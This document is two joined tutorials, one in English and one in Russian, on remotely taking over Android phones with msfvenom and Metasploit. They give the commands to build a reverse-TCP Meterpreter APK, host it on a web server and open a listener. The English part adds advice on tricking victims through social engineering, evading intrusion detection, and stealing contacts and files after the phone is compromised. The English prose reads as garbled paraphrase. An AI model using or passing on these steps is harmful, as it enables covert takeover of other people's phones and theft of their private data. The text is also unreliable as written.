Getting into Android OS remotely using Kali Linux
We will utilize msfvenom in order to make a payload and set it aside as a ‘.apk’ file. In the execution of generating a payload, now we have to frame-up a listener to the Metasploit framework. Then, we have to manipulate the victim in order that he/she is convinced to download that payload or the ‘.apk’ the file generated earlier. Usually, social engineering is the psychological manipulation of people into performing actions or divulging confidential information. Now, once the victim installs the malevolent file then the attacker can easily get back a meterpreter session on the Metasploit. You can likewise hack an Android gadget through the Internet by utilizing your Public/External IP in the LHOST and also by the concept of ‘port forwarding’.
Note: Use the beneath techniques just for instructive/testing purposes on your own Wi-Fi or with the consent of the proprietor. Try not to utilize this for malignant purposes.
Generating the payload
1. Type “ifconfig” into the terminal session in order to view the network interface configuration of the device we are using to execute the attack.
1. eth0 is the First Ethernet interface (Consists of ‘inet’ which shows the IP(Internet Protocol) address of our attacking machine).
2. lo is the Loopback interface.
After getting your interface IP address, we will use msfvenom that will produce a payload to infiltrate the Android OS.
2. Listing all the accessible choices with msfvenom. (This will list down all the boundaries that will assist us with producing our payload).
Now, the payload can be saved in ‘.exe’, ‘.msi’, or ‘.apk’, etc. format, but for this tutorial, we will use ‘.apk’ format as the victim’s device would an android device which supports ‘.apk‘ extension.
3. So now we have to create a payload which we may execute on the victim’s device in order to execute the attack successfully.
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.18.63 LPORT=4444 R> /var/www/androidhack.apk/
1. -p shows the payload type
2. android/meterpreter/reverse_tcp indicates a reverse meterpreter shell would roll in from an objective Android gadget.
3. LHOST is our IP i.e attacker’s IP
4. LPORT is the listening port on the attacker’s machine.
5. R> /var/www/html generates the output directly on apache server
6. ‘.apk’ is the file extension of the Trojan created.
This would set aside some effort(time) to produce an apk document of around 10,186 bytes.
Setting up the Attack
1. Firstly, we need to check the status of the Apache server (Web Application Server) and to do so enter the following commands in the terminal
service apache2 start service apache2 status
We, can use this(apache2) web server in order to host files, or we can put on Google Drive or Dropbox or any of the cloud providers who have shared files and then we can put those files on the server, and then the victims will not be able to detect any malicious intent because the Network Intrusion Detection System may bypass and say, Hey! This is a friendly domain we’ll let it go.
2. Now, all seems to be set up correctly, and we can start the msfconsole.
3. Use multi/handler exploit, set payload the same as generated previously(This will help us to generate a listener).
use multi/handler set PAYLOAD android/meterpreter/reverse_tcp
4. Now, we will use the ‘show options’ command in order to see the configuration, set the LHOST(Local Host) and LPORT(Local Port) values the same as used in the payload (Type the following commands for the same).
5. Here, the LPORT is already set, so we just need to set the LHOST to our attacking machine’s IP, and we can do this by the following command:
6. Now, we can type ‘exploit’ in order to launch the desired attack.
So, once we execute the ‘exploit‘ command, the TCP handler starts immediately. In real-life scenarios, some social engineering procedures can be utilized to let the objective download the vindictive ‘.apk’ file. For the tutorial purpose, we are simply making the victim machine download the file in the Android Phone.
Executing the attack
Exploitation:
1. Type the following web address in a web browser on the victim’s phone.
(/.apk) Example in this case: 192.168.18.63/androidhack.apk
2. After downloading the payload successfully, we have to select the app to install.
Up until now, this alternative has been seen regularly when we attempt to introduce some outsider applications, and ordinarily, clients won’t falter to permit the application from obscure sources.
3. Enable the settings to introduce applications from outside sources. Lastly hit the install choice at the base.
Once the victim installs the application and runs it, the meterpreter session would be opened immediately at the attacker’s terminal.
Post Exploitation:
1. Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.
2. You can interact with any session by typing the following command:
After entering the session, type “help” to list down all the commands we can put forward in this session. You can see some file system commands that are useful when you’re attempting to pursue some touchy data or information. By utilizing these, You can undoubtedly download or transfer any document or data.
3. Type the following command in order to see all the apps which are installed on the particular Android OS.
4. We can also uninstall any app from the Android device.
5. Now let us extract some contacts from the target device by typing “dump” and double tab. It will show all the choices to extricate from the device. Type “dump_contacts” and enter. It will separate all the contacts from the Android gadget and will spare it in our local directory. To see this document type “ls” and “cat [file_name]”
This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers. There are loads of more commands available in meterpreter. Further, attempt to investigate and realize what we can perform with an Android gadget. This reason we have effectively entered the Android gadget utilizing Kali Linux and Metasploit-Framework. A sound tip to make sure about your Android gadget is to not introduce any application from an obscure source, regardless of whether you truly need to introduce it, attempt to peruse, and look at its source code to get a thought whether this file is malevolent or not.
- The above tutorial can be successfully implemented in the case of an android 8.0 or lesser version.
- This tutorial is made in order to give the community a basic idea of how the hackers get into our personal gadgets, and the above method is the most basic one i.e by firstly creating an android payload by msfvenom and then exploiting it using the Metasploit-framework as it is delivered using various social engineering techniques onto the victim’s phone.
#2 Хакинг Android — Получение доступа к Android с помощью Meterpreter.
Давайте взломаем нашу машину на Android с помощью пэйлоада, который мы создадим, используя MSFVenom. Это будет нашей первой атакой на девайс.
Для реализации данной атаки нам понадобятся две машины – это Kali Linux, и Android. Первое, что мы сделаем – это проверим ip-адрес машины на Kali, с помощью команды «ifconfig»:
Зная ip-адрес, мы сможем сгенерировать пэйлоад для Aндройд-девайса.
Перейдем на Рабочий стол Kali:
Далее, запустим MSFVenom, где команда будет выглядеть как: «msfvenom–pandroid/meterpreter/reverse_tcpLHOST=192.168.0.127 LPORT=5555 –o shell.apk»:
Жмем клавишу «Enter», и начинаем процесс генерации пэйлоада:
Попутно запустим веб-сервер «Apache», с помощью команды: «sudo service apache2 start»:
Теперь нам необходимо перенести сгенерированный пэйлоад с рабочего стола в директорию веб-сервиса. Команда будет выглядеть как: «mv shell.apk /var/www/html/»:
Проверим, все ли мы правильно сделали, перейдя в директорию веб-сервера:
Следующим шагом нам нужно будет запустить Metasploit Framerwork, с помощью команды: «msfconsole»:
Переходим в наш Андройд-девайс, запустив Гугл Хром, для того, чтобы перейти по адресу нашего веб-сервера на Kali:
Теперь нам нужно загрузить шелл на Андройд. Переходим по адресу: «192.168.0.127/shell.apk»:
Жмем кнопку «Ok», и скачиваем файл:
Далее щелкаем по кнопке «Open», и у нас появляется всплывающее окно с правами доступа в операционной системе (например, доступ к записи аудио и доступу к контактам):
Жмем кнопку «Next», и у нас появляются дополнительные опции доступа:
Кликаем по кнопке «Install», и производится инсталляция. Через некоторое время мы получаем дополнительное всплывающее окно, где жмем кнопку «Install Anyway»:
И это последний шаг установки шелла. Снова появляется предупреждение, которое мы игнорируем:
Щелкаем по кнопке «Don’t Send», и далее пока не открываем пэйлоад:
Переходим в терминал Kali Linux, с уже открытым инструментом Metasploit Framework. Нам нужно настроить прослушиватель подключения.
Это делается в несколько шагов. Первая команда: «use exploit/multi/handler»:
Далее выбираем пэйлоад с помощью команды: «set payload android/meterpreter/reverse_tcp»
Далее прописываем хост и порт для приема соединения:
Прописываем команду «run», в машине на Андройд жмем кнопку «Open»:
В Андройд-девайсе ничего не происходит, но если мы перейдем в Kali Linux, то увидим открывшуюся сессию Meterpreter-a:
Можем поиграться, и посмотреть пользователя, под которым мы находимся в системе. Это команда «getuid»:
С помощью команды «help», можно увидеть список команд, которые можно использовать на Андройде:
Покопайтесь в командах. Здесь можно найти много всего интересного.
На этом все. Всем хорошего дня!